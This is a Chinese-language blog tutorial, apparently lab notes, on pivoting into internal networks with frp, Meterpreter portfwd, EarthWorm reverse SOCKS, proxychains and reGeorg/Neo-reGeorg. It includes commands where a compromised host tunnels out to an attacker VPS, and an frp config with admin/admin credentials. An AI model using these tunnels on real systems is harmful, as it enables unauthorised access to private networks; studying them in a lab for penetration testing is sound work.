内网穿透/代理

frp篇

web端口转发+rdp转发

ubantu 桥接模式 ip:192.168.1.102 (模拟公网server)

win7 NAT模式 ip:192.168.119.129(模拟内网)

下载对应版本https://github.com/fatedier/frp/releases


ubantu

1
2
3
wget https://github.com/fatedier/frp/releases/download/v0.37.0/frp_0.37.0_linux_amd64.tar.gz
tar -zxvf frp_0.37.0_linux_amd64.tar.gz
cd frp_0.37.0_linux_amd64.tar.gz
1
2
3
4
5
#frps.ini

[common]
bind_port = 6000 #frp服务器端口
vhost_http_port= 8080 #设定的http访问端口 (一定要写)
  • 启动:./frps -c frps.ini

win7

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#frpc.ini

[common]
server_addr = 192.168.1.102 #ip
server_port = 6000 #本机绑定的端口

[web]
type = http
local_ip = 192.168.119.129
local_port = 80 #要映射的本地端口
custom_domains = 192.168.1.102 #或者域名
remote_port = 8080
http_user = admin #安全认证
http_pwd = admin

[rdp]
type=tcp
local_ip = 192.168.119.129 #远程桌面映射3389端口
local_port = 3389
remote_port = 3389

  • 启动 frpc -c frpc.ini

代理

  • vps
1
2
3
4
#frps.ini

[common]
bind_port = 6000

  • 跳板机
1
2
3
4
5
6
7
8
9
10
11
#frpc.ini

[common]
server_addr = 192.168.1.102 #vps-ip
server_port = 6000 #本机绑定的端口

[plugin_socks]
tpye = tcp
local_port = 11111 #一定写本地端口
remote_port =10010 #带出到外网vps端口
plugin = socks5
  • 攻击机
1
直接绑定vps-ip和remote_port

portfwd

kali

1
portfwd add ‐l 33333 ‐r 192.168.1.102 ‐p 3389      将192.168.1.102的3389端口转发到kali 33333端口

在meterpreter会话口将端口转发出来,

参考


下面测试代理的环境:

本地主机:192.168.1.101

kali :192.168.1.103 (桥接)

内网入口双网卡:192.168.1.102(桥接),连接内网192.168.52.0/24(vmnet1) (内网入口)

内网服务器:192.168.52.138

能否代理成功就看本机能否访问http://192.168.52.138/


工具:

proxifier:https://www.filehorse.com/download-proxifier/ or https://proxifier.soft32.com/

EarthWorm,停止更新

reGeorg https://github.com/sensepost/reGeorg

Neo-reGeorg https://github.com/L-codes/Neo-reGeorg

earthworm

正向代理

内网攻击机–>失陷公网主机

我们拿下的是一台公网机器shell,该机器有内网网卡,与内网相通。通过在失陷公网添加代理,对内网资产进行探测。

  • 失陷公网主机(跳板机)
1
./ew  -s  ssocksd  -l  10010       //在10010端口开启socks代理,SOCK5
  • kali
1
2
3
4
5
vi /etc/proxychains.conf

注释掉socks4,添加

socks5 192.168.1.102 10010

ew1

  • 本机win利用proxifier添加ip 端口进行全局代理也可以

ew2

反向代理

内网攻击机 -> 自己的公网vps -> 受陷内网

场景就是我们通过某些服务直接拿下了内网一台机器,该机器只是通过映射某些端口对外网,能够提供相应服务。

我们需要通过socks5反向代理将流量带进内网,进行内网探测。

kali 192.168.1.101

vps 35.34.xx.xx

内网失陷主机 192.168.119.20

  • 内网失陷主机
1
ew_for_win_32.exe -s rssocks -d 35.34.xx.xx -e 1024       反向代理连接公网服务器。
  • vps
1
2
3
./ew_for_linux-s -rcsocks -l 1010 -e 1024

监听1010等本机访问 监听1024端口,等内网反弹。
  • kali
1
2
3
vi /etc/proxychains.conf

socks5 35.34.xx.xx 1010
  • or 本机windows
1
./ew  -s  rssocks -d  35.34.xx.xx  -e 1024

reGeorg

  • 正向代理

tunnel.php多了dl("php_sockets.dll");这行代码。作用是加载socket这个模块,但dl自php 5.3起默认情况下处于禁用状态,所以php 5.3版本以下才可以使用tunnel.php。如果启用,则需配置php.ini(开启enable_dl ,安装php_sockets扩展客户端)。

window下这个靶机我是没有配置好。。。

本机:

1
python reGeorgSocksProxy.py -p 10010 -u http://192.168.1.102/tunnel.php

Neo-reGeorg

  • 正向代理

人家魔改的,我的靶机还是报错,,,感觉这个还是有点限制的

本机:

1
2
python neoreg.py generate -k zzz
python neoreg.py -k zzz -u http://192.168.1.102/tunnel.php -p 10010
  • Copyrights © 2020-2023 Shmily-ing
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信